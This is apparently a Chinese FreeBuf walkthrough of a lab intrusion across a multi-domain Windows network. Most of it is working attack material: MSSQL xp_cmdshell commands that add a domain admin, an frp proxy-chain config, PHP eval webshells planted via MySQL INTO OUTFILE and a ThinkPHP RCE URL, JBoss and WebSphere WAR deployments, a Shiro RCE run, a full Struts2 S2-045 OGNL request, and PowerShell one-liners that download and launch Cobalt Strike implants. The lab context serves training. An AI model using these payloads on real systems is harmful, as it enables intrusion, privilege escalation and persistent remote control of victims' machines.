综合环境靶场攻击过程记录(内网域森林+服务森林)下篇
2021-08-03 03:22:29 Author: www.freebuf.com(查看原文) 阅读量:44 收藏

综合环境靶场攻击过程记录(内网域森林+服务森林)上篇

1)信息收集

信息收集时候得到信息如下

  1. mssql:10.12.10.3:1433:sa admin@123

  2. 在域控administrator的桌面发现密码QWEasd123

尝试连接IPC,dayu和administrator用户均失败

shell net use \\10.12.10.3\ipc$ "QWEasd123" /user:10.12.10.3\administrator

107.png

说明密码不是远程桌面的

2)漏洞利用

(1)msfconsole利用命令执行模块

# 设置代理
setg Proxies socks5:1.xxx.xxx.xx4:13633
setg ReverseAllowProxy true

# 使用攻击模块
use admin/mssql/mssql_exec
set CMD whoami
set RHOSTS 10.12.10.3
set PASSWORD admin@123
run

108.png

创建domain管理用户成功,添加管理员组失败

net user ch4nge6 QWEasd123 /add /domain
net group "domain admins" ch4nge6 /add /domain

109.png

110.png

(2)在本地的navicat连接mssql,进行命令执行操作

依次执行查询

# 查询xp_cmdshell是否开启
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
    可以看到返回结果是1,说明现在的xp_cmdshell是开启状态

111.png

# 如果没有开启,执行下面命令开启xp_cmdshell
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell',1;
    RECONFIGURE;
#命令执行,添加到admins组
    master..xp_cmdshell 'net group "domain admins" ch4nge6 /add /domain'

112.png

查询是否是管理员组

113.png

(3)在子域控制器使用IPC与10.12.10.3建立IPC连接

shell net use \\10.12.10.3\ipc$ "QWEasd123" /user:10.12.10.3\ch4nge6

114.png

3)上线CS

(1)建立中转监听

在子域控制器的会话基础上建立中转监听

115.png

116.png

使用此监听生成木马ch4nge4.exe

117.png

(3)将木马上传到子域控制器,使用IPC复制到10.12.10.3

shell copy ch4nge4.exe \\10.12.10.3\c$
shell dir \\10.12.10.3\c$

118.png

(2)上线CS

使用数据库命令执行,执行木马

# 先建立一个隐蔽的文件夹,把木马移动进去master..xp_cmdshell 'mkdir C:\Users\Administrator\Documents\dayuSetting'master..xp_cmdshell 'move ch4nge4.exe C:\Users\Administrator\Documents\dayuSetting\'

119.png
120.png

运行木马,上线CSmaster..xp_cmdshell 'cd C:\Users\Administrator\Documents\dayuSetting & ch4nge4.exe'

121.png

4)独立子域信息收集

(1)ipconfig /all

双网卡:
    me1:	10.12.10.3
    域控:	10.12.10.3
            dul.com
    me2:20.20.20.10

(2)nbtscan扫描20.20.20.0/24(独立域)

20.20.20.10     DUL\WIN-LOH5RS7UNDP            SHARING DC
20.20.20.101    WORKGROUP\WIN-AMJ9T9TL123       SHARING
20.20.20.102    -no name-
20.20.20.103    -no name-
20.20.20.104    -no name-
20.20.20.105    -no name-
20.20.20.199    DUL\CAIWU                      SHARING
*timeout (normal end of scan)

122.png

(3)Cscan扫描20.20.20.0/24

Cscan.exe 20.20.20.0/24 MS17010

Cscan 5.4
By K8gege
20.20.20.0/24
load MS17010

C_Segment: 20.20.20.
=============================================
20.20.20.10 MS17-010 WIN-LOH5RS7UNDP dul.com [Win 2008 HPC Edition 7601 SP 1]
20.20.20.101 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.102 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.104 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.103 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.105 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.199 MS17-010 CAIWU dul.com [Win 7 Professional 7601 SP 1]
=============================================
onlinePC:7
Finished!

(4)fscan扫描20.20.20.101-105和199端口

shell fscan.exe -h 20.20.20.1/24 -p 1-65535


WebTitle:http://20.20.20.103:5985 404 None
WebTitle:http://20.20.20.103:47001 404 None
NetInfo:
[*]20.20.20.103
   [->]WIN-AMJ9T9TL123
   [->]20.20.20.103
20.20.20.10	MS17-010	(Windows Server 2008 HPC Edition 7601 Service Pack 1)
WebTitle:http://20.20.20.105:47001 404 None
WebTitle:http://20.20.20.105:5985 404 None
WebTitle:http://20.20.20.105:9060 404 None
WebTitle:http://20.20.20.105:9080 404 None
NetInfo:
[*]20.20.20.105
   [->]WIN-AMJ9T9TL123
   [->]20.20.20.105
WebTitle:http://20.20.20.10:47001 404 None
WebTitle:http://20.20.20.101:8080 200 Welcome to JBoss AS
NetInfo:
[*]20.20.20.104
   [->]WIN-AMJ9T9TL123
   [->]20.20.20.104
NetInfo:
[*]20.20.20.101
   [->]WIN-AMJ9T9TL123
   [->]20.20.20.101
WebTitle:https://20.20.20.105:9443 404 None
WebTitle:https://20.20.20.105:9043 404 None
mssql:20.20.20.10:1433:sa admin@123
WebTitle:http://20.20.20.104:5985 404 None
WebTitle:http://20.20.20.104:47001 404 None
WebTitle:http://20.20.20.104:8080 200 Apache Tomcat/8.5.65
WebTitle:http://20.20.20.101:47001 404 None
WebTitle:http://20.20.20.101:5985 404 None
WebTitle:https://20.20.20.105:8880 500 None
NetInfo:
[*]20.20.20.199
   [->]caiwu
   [->]20.20.20.199
   [->]2002:1414:14c7::1414:14c7
NetInfo:
[*]20.20.20.102
   [->]WIN-AMJ9T9TL123
   [->]20.20.20.102
20.20.20.199	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
WebTitle:http://20.20.20.102:5985 404 None
WebTitle:http://20.20.20.102:47001 404 None
mysql:20.20.20.199:3306:root root
WebTitle:http://20.20.20.102:80 200 None
WebTitle:http://20.20.20.199:80 200 phpStudy 鎺㈤拡 2014 

scan end

frP三级代理

1)环境说明

A:V/PS机器:1.xxx.xxx.xx4
B:域普通用户:192.168.73.137和10.10.10.101
C:子域控制器:10.10.10.10和10.12.10.5
D:独立域:10.12.10.3和20.20.20.10
E:核心区机器

内网核心区主机不能直接连接\/ps,可以连接内网D主机,内网D主机不能直接连接\/ps,可以连接内网C主机,内网C主机不能直接连接\/ps,可以连接内网B主机,B主机可以直接连接\/ps,所以通过B作为跳板,将socks代理建设在内网C主机中后,将打通隧道进行横向攻击核心区机器!开始!!

2)ini文件配置信息

(1)V/PS

# frps.ini
[common]
bind_addr = 0.0.0.0
bind_port = 49816

(2)普通域用户(B)web:

# frpc.ini
[common]
server_addr = 1.xxx.xxx.xx4
server_port = 49816
[http_proxy]
type = tcp
local_ip = 10.10.10.101
local_port = 49916
remote_port = 49916
# frps.ini
[common]
bind_addr = 10.10.10.101
bind_port = 49816

(3)子域控制器(C):

# frpc.ini
[common]
server_addr = 10.10.10.101
server_port = 49816
[http_proxy]
type = tcp
local_ip = 10.12.10.5
local_port = 49916
remote_port = 49916
# frps.ini[common]bind_addr = 10.12.10.5bind_port = 49816

(4)独立域:

# frpc.ini[common]server_addr = 10.12.10.5server_port = 49816[http_proxy]type = tcpremote_port = 49916plugin = socks5

3)搭建隧道

frpc.exe、frps.exe和ini文件放到各自目录之后开始执行
要注意执行顺序,从内而外,不能不按顺序全执行

(1)先给独立域和子域控建立代理

子域控开启服务端监听

shell frps.exe -c 3proxy\frps.ini

123.png

独立域开启客户端连接

shell frpc.exe -c 3proxy\frpc.ini

124.png

子域控回显如下:此时双方建立隧道成功

125.png

(2)给子域控和子域普通(WEB)建立代理

子域普通(WEB)开启服务监听

shell frps.exe -c 3proxy\frps.ini

126.png

子域控开启客户端连接

shell frpc.exe -c 3proxy\frpc.ini

127.png

WEB回显如下:此时双方建立隧道成功

128.png

(3)给子域普通WEB和\/PS建立代理

\/PS开启服务监听

frps.exe -c frps.ini

129.png

子域普通WEB开启客户端连接

shell frpc.exe -c 3proxy\frpc.ini

130.png

(4)proxychains

1.xxx.xxx.xx4:49916

(5)验证是否成功

131.png

1)信息收集

20.20.20.199 MS17-010 CAIWU dul.com [Win 7 Professional 7601 SP 1]WebTitle:http://20.20.20.199:80 200 phpStudy 鎺㈤拡 2014NetInfo:[*]20.20.20.199    [->]caiwu    [->]20.20.20.199    [->]2002:1414:14c7::1414:14c7mysql:20.20.20.199:3306:root root

php探针

http://20.20.20.199/

132.png

2)漏洞利用

(1)弱口令登录

使用phpmyadmin连接mysql数据库root:root

http://20.20.20.199/phpmyadmin/

133.png

(2)写入webshell

查询数据库版本

select @@version;

134.png

首先基础语法查询是否 secure_file_priv 没有限制
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录

show global variables like '%secure_file_priv%';

结果为空,可以直接写入webshell

135.png

(3)MySQL写入webshell

写shell语句,浏览器访问20.20.20.199,页面显示探针路径C:/phpStudy/WWW/l.php

select '<?php @eval($_POST[yyds]);?>' into outfile 'C:/phpStudy/WWW/ch4nge66.php';

136.png

蚁剑连接成功

http://20.20.20.199/ch4nge66.php密码yyds

137.png

3)上线CS

CS在20.20.20.10设置中转监听,ip为20.20.20.10,生成木马ch4nge5.exe,上传到蚁剑里面

![138.png]139.pngs/20210616/1623804107_60c948cb6710dc874094c.png!small)

139.png

140.png

141.png

运行木马,上线CS

142.png

1)信息收集

20.20.20.101 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.101:8080 open
NetInfo:
[*]20.20.20.101
    [->]WIN-AMJ9T9TL123
    [->]20.20.20.101

Jboss中间件

http://20.20.20.101:8080/

143.png

2)漏洞利用

(1)弱口令登录

admin:admin

http://20.20.20.101:8080/admin-console/login.seam?conversationId=16

(2)拿shell:JMX console未授权访问漏洞

同10.10.10.90

进入service=MainDeployer页面之后,找到methodIndex为17 or 19的deploy填写远程war包地址进行远程部署:

144.png

将jsp大马做成的war包放在20.20.20.199机器的www目录下

145.png

访问测试一下,可以正常访问

146.png

输入http://20.20.20.199/ch4nge2.war

147.png

点击Invoke

148.png

访问jsp大马

http://20.20.20.101:8080/ch4nge2/ch4nge2.jsp

149.png

3)上线CS

将ch4nge5.exe木马文件放在20.20.20.199的www路径中

150.png

命令执行

powershell -Command (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/ch4nge5.exe','ch4nge5.exe');start-process ch4nge5.exe

151.png

1)信息收集

(1)端口信息

20.20.20.102 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
20.20.20.102:3306 open
20.20.20.102:80 open
NetInfo:
[*]20.20.20.102
    [->]WIN-AMJ9T9TL123
    [->]20.20.20.102

(2)ThinkPHP版本

ThinkPHP框架,输入不存在内容报错出版本

ThinkPHP V5.0.22

152.png

2)漏洞利用

(1)命令执行

phpinfo

http://20.20.20.102/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1%20and%20it%27ll%20execute%20the%20phpinfo

153.png

(2)写入webshell

Payload

http://20.20.20.102/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=ch4nge6.php&vars[1][]=%3C?php%20@eval($_POST[%27yyds%27]);?%3E

回显30

154.png

蚁剑连接

http://20.20.20.102/ch4nge6.php
密码:yyds

155.png

3)上线CS

156.png

1)信息收集

(1)端口信息

20.20.20.103 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]	WebTitle:http://20.20.20.103:8080 200 Apache Tomcat/8.5.65NetInfo:[*]20.20.20.103    [->]WIN-AMJ9T9TL123    [->]20.20.20.103

(2)web中间件信息

Tomcat中间件

Apache Tomcat/8.5.65

shiro框架

2)漏洞利用

这里靶机出问题了,用以前做的图

http://20.20.20.103:8080/shiro/

(1)代理

1.xxx.xxx.xx4:49916

157.png

(2)开始攻击

proxychains python3 shiro-1.2.4_rce.py http://20.20.20.103:8080/shiro/login.jsp

158.png

(3)上线CS

第一步选择windows系统
第二步执行上线CS
powershell -Command (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/ch4nge51.exe','ch4nge51.exe');start-process ch4nge51.exe

powershell -Command (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/ch4nge6.ps1','ch4nge6.ps1');start-process ch4nge6.ps1

159.png

已上线CS

160.png

16.1 信息收集

(1)端口信息

20.20.20.104 WIN-AMJ9T9TL123  [Win 2016 Standard 14393]
WebTitle:http://20.20.20.104:8080 200 Apache Tomcat/8.5.65
NetInfo:
[*]20.20.20.104
    [->]WIN-AMJ9T9TL123
    [->]20.20.20.104

(2)服务框架信息

Struts2框架

2)漏洞利用

(1)漏洞验证

http://20.20.20.104:8080/S2-057/index/$%7B(111+111)%7D/actionChain1.action

表达式进行运算,存在漏洞

170.png

共存在5个版本

http://20.20.20.104:8080/S2-008/
http://20.20.20.104:8080/S2-045/
http://20.20.20.104:8080/S2-046/
http://20.20.20.104:8080/S2-052/orders.xhtml
http://20.20.20.104:8080/S2-057/

3)上线CS

POC

POST /S2-045/fileupload/doUpload.action HTTP/1.1Host: 20.20.20.104:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: %{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='powershell -Command (new-object System.Net.WebClient).DownloadFile(\'http://20.20.20.199/ch4nge5.exe\',\'ch4nge5.exe\');start-process ch4nge5.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} boundary=---------------------------255663886332559909593529682920Content-Length: 344Origin: http://20.20.20.104:8080Connection: closeReferer: http://20.20.20.104:8080/S2-045/fileupload/upload.actionCookie: JSESSIONID=7B84132FC5F461D411AEBE4DA902C2AAUpgrade-Insecure-Requests: 1-----------------------------255663886332559909593529682920Content-Disposition: form-data; name="upload"; filename=""Content-Type: application/octet-stream-----------------------------255663886332559909593529682920Content-Disposition: form-data; name="caption"aaa-----------------------------255663886332559909593529682920--

上线CS-POC原始payload

powershell -Command (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/ch4nge5.exe','ch4nge5.exe');start-process ch4nge5.exe

171.png

172.png

1)信息收集

(1)开放web服务

https://20.20.20.105:9043/ibm/console/logon.jsp

Websphere中间件

200.png

2)漏洞利用

(1)弱口令登录,部署war木马

admin/admin@123

存在Websphere中间件漏洞,利用弱口令本地部署war上传一句话jsp,在执行powershell上线CS!

201.png

(2)选择准备好的大马war包,上传

202.png
默认下一步
203.png
默认下一步
204.png
默认下一步
205.png
默认下一步
206.png
上下文根写入/ch4nge2
207.png

208.png

默认,完成

209.png

点击保存

210.png

应用程序--应用程序类型--WebSphere 企业应用程序
选择ch4nge2.war,启动

211.png

212.png

(3)访问大马

http://20.20.20.105:9080/ch4nge2/ch4nge2.jsp

213.png

3)上线CS

powershell -Command (new-object System.Net.WebClient).DownloadFile('http://20.20.20.199/ch4nge5.exe','ch4nge5.exe');start-process ch4nge5.exe

214.png

本次靶场环境共有14台机器,环境不算小,环境中综合布置了内网中CVE-2020-1472、永恒之蓝、域信任关系利用;Jboss、WebSphere中间件知识;shiro、ThinkPHP、Struts2服务框架知识;MySQL和MSSQL数据库知识。利用的技术有比较基础,但是打几遍下来,心里对内网渗透的思路有了更清晰的认识,特别是在每一步的时候需要考虑的事情,信息收集不到位就会与一整个网段擦肩而过。感谢大余师父的靶场!靶场不适合外传,小伙伴们想做的可以自己搭建一下,后面也会写出相关的环境搭建和渗透手法文章。

渗透中学到的小技巧

1.Cscan工具运行需要.Net Framework3.5环境
2.多级代理的时候永恒之蓝漏洞无法完全利用
3.攻击内网的时候,每拿下一台机器需要对其进行信息收集,看看是否有双网卡(是否有新的网段)


文章来源: https://www.freebuf.com/articles/web/277573.html
如有侵权请联系:admin#unsafe.sh